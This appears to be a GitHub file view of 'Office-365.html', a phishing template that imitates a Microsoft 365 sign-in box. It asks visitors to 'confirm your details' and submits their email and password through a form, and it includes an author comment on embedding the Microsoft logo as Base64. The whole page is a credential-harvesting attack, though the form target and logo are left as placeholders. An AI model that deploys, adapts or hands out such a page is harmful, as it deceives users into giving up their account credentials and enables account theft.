-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathOffice-365.html
124 lines (115 loc) · 2.5 KB
/
Office-365.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
<!DOCTYPE html>
<html lang="en">
<head>
<style>
body {
margin: 0px;
}
/* Background */
#background {
position: absolute;
width: 100%;
height: 100%;
background: linear-gradient(106.75deg, #FFE7E7 1.62%, rgba(255, 253, 213, 0) 96.07%);
}
/* Window */
#window {
position: absolute;
background: #ffffff;
width: 450px;
height: 400px;
top: 30%;
left: 40%;
-webkit-box-shadow: 5px 10px 6px -6px #777;
-moz-box-shadow: 5px 10px 6px -6px #777;
box-shadow: 5px 10px 6px -6px #777;
}
/* Microsoft 365 Logo */
#microsoft-logo {
position: absolute;
width: 190px;
height: 51px;
margin: 15px 0 0 15px;
}
/*Confirm Details*/
#confirm-details {
position: absolute;
width: 294px;
height: 26px;
font-family: Calibri;
font-style: normal;
font-weight: normal;
font-size: 24px;
line-height: 28px;
color: #000000;
margin: 100px 0 0 28px;
}
#email-container {
margin: 0 0 10px 30px;
position: absolute;
width: 80%;
height: 64px;
top: 40%;
border: none;
}
#password-container {
margin: 0 0 10px 30px;
position: absolute;
width: 80%;
height: 64px;
top: 60%;
border: none;
}
input {
width: 90%;
padding: 10px;
border: none;
border-bottom: 1px solid black;
}
button {
/* remove default behaviour */
appearance: none;
-webkit-appearance: none
/* usual styles */
padding: 20px;
border: none;
background-color: #3F51B5;
color: #fff;
font-weight: 350;
border-radius: 1px;
width: 20%;
height: 30px;
position: absolute;
top: 80%;
left: 65%;
}
</style>
</head>
<body>
<div id="background">
<div id="window">
<div id="microsoft-logo">
<img src= /> /*Your image needs to be in Base64 format. I use codebeautify to convert my images to Base64 format*/
</div>
<div id="confirm-details">
Please confirm your details
</div>
<form action="text" method="POST" target="_blank">
<div id="email-container">
<input type="text" name="email" placeholder="Email Address"/>
</div>
<div id="password-container">
<input type="text" name="password" placeholder="Password"/>
</div>
<button onClick="closeWin()">Confirm</button>
</form>
</div>
</div>
<script>
var myWindow
function closeWin() {
myWindow.close();
}
</script>
</body>
</html>